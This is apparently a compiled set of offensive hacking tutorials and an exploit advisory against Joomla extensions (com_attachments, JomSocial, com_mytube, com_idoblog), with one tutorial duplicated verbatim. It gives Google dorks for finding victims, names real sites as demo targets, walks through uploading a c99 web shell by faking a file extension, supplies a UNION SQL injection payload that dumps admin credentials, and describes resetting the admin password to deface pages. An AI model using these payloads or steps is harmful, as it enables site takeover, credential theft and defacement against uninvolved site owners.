Joomla Attachments Shell Upload
# Exploit Title: Joomla Com_Attachments Component Arbitrary File Upload Vulnerability
# Google Dork: inurl:”index.php?option=com_attachments”
# Date: 2013-07-09
# Exploit Author: Stars Hacking Team
# We Are: S3Ri0uS , Satanic2000 , NuLLeRRoR , Mohamadpk , blackc0der
# Email: Z3ro.Day@Hotmail.Com , Ste4ler_Mind@Yahoo.Com , Mr.Satanic2000@Rogers.Com
# Vendor Homepage: http://joomla.org
# Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/downloads/3115
# Tested on: Lin
#######################################################################################################
# ~> ExpLoit <~ # # http://target/index.php?option=com_attachments&task=upload # # 1. Upload Your File . ! # 2. Find Your File in This Path: # http://target/attachments/article # 3. End 😛 # ######################################################################################################## # ~> DeMo <~
# http://www.iwalkforlife.com/index.php?option=com_attachments&task=upload
# http://www.iwalkforlife.com/attachments/article/0/stars.jpg
# —-
# http://www.lgbtpsychology2013.com/index.php/en/?option=com_attachments&task=upload
# http://www.sailors-club.net/index.php?option=com_attachments&task=upload
# http://www.project-establis.eu/index.php?option=com_attachments&task=upload
########################################################################################################
# Spt : Pejv4k , Skitt3r , Netw0rm , HUrr!c4nE , Kinglet , Skipp3r , AG , Amo Vahid , Ahmadbady , XzadX
# iskorpitx , HellBoy , Cyber-Terrorist And All My Best Friend :X
JomSocial ~ Joomla Shell Upload Vulnerability
Firefox
A Shell
Tamper Data
Vulnerable Site
& a Brain 🙂
Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*
Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos
Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. “myshell”)
3. Copy the shell to the same folder and rename it to “yourshell.php.flv”
4. Now in your folder you have 2 files, “myshell.php” & “myshell.php.flv”.
Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.
Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln.
The reason for having created a file called “myshell.php.flv”, is to trick the uploader intothinking that you are uploading a FLV file.
Uploading shell:
1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your “myshell.php.flv”.
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to tamper then click on tamper.
9. Look for “myshell.php.flv” then delete the .flv part meaning you will have “myshell.php” left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.
Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your “random.php”
6. And your IN!
How to hack joomla : Tutorial
Google dork: inurl:”option=com_mytube”
Type that Dork in Google.
2- Inject Target
Find a url like this:
http://site.com/index.php?option=com_mytube&Itemid=88..
Now replace the url like this:
Click here to view: http://pastebin.com/ZxxU8Nsr
If the site is vulnerable, you can see something like this:
We can see username, email and activation code. (username:email:activation code)
Now, let this page open and open a new page.
3- Admin password reset
Go to:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request
Type the email adress found in step 2 and press Submit.
The activation code should be resetted.
Return to the first page, refresh the page and take the new activation code.
Paste him in the token and press Submit.
problem with token.. :((
UPDATE: Joomla! 1.5.16 now hashes the reset token
if you see a thing like :$1$14411: after the activation code, it will not work
4- Admin Login
If you done everything ok, your Password page will load. Enter your new password…
After that go to:
http://www.site.com/administrator/
Standard Joomla portal content management system
Enter the username (found in step 2) and your new password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!
Joomla Hacking Tutorial
If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!?
Joomla is made of components and modules and there are some developers apart from
official team that offer their solutions to improve Joomla.
That components and modules mede by that other developers are weak spots!
I hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can’t tell that I hacked Joomla!
Finding Exploit And Target : Those two steps could go in different order, depend what you find first target or exploit…
Google dork: inurl:”option=com_idoblog”
Comes up with results for about 140,000 pages
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vulnrablity
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–
Exploit can be separated in two parts:
Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don’t exist, exploit won’t worked (not completely confirmed)
Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–
This part looking for username and password from jos_users table
Testing Vulnerability
Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick ‘Load images automatically’
Go to:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally…
Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin
Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1–
Site is vulnerable
Inject Target
Open reiluke SQLiHelper 2.7
In Target copy
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have 
Notice that exploit from inj3ct0r wouldn’t work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data
Let Dump username, email, password from Column Name jos153_users. Click on Dump Now
username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time…
The easiest way to hack is to reset Admin password!
Admin Password Reset
Go to:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request
JomSocial ~ Joomla Shell Upload Vulnerability
Stuff you need:
Firefox
A Shell
Tamper Data
Vulnerable Site
& a Brain 🙂
Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*
Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos
Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. “myshell”)
3. Copy the shell to the same folder and rename it to “yourshell.php.flv”
4. Now in your folder you have 2 files, “myshell.php” & “myshell.php.flv”.
Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.
Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln.
The reason for having created a file called “myshell.php.flv”, is to trick the uploader into thinking that you are uploading a FLV file.
Uploading shell:
1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your “myshell.php.flv”.
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to tamper then click on tamper.
9. Look for “myshell.php.flv” then delete the .flv part meaning you will have “myshell.php” left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.
Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your “random.php”
6. And your IN!